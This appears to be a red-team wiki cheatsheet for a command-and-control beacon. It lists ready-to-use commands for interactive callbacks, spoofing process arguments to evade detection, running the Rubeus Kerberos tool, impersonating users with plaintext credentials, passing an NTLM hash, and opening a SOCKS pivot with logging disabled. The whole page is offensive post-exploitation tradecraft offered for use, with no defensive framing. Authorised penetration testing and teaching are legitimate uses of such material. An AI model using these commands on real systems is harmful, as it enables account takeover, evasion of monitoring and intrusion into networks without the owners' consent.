Cheatsheet

Beacon control:

# Sleep 
sleep 0 # make interactive 


# Argue take two commands, make the second look like the first: 
argue whoami /totally-legit
argue powershell -command "get-adcomputer -Filter {...} .....

Execute Binaries:

# Net Assembly execute
execute-assembly /root/Rubeus.exe

Session Control:

# make a token for current sessions
make_token darth.vadar deathstar123!

# Pass the Hash
pth darth.vadar 91d85135bb2c4e12c46efbb77612c487

Socks:

socks 65001 SOCKS5 enableNoAuth "" "" disableLogging

PreviousBeacon Object Files (BOF)NextLateral Movement

Last updated 5 months ago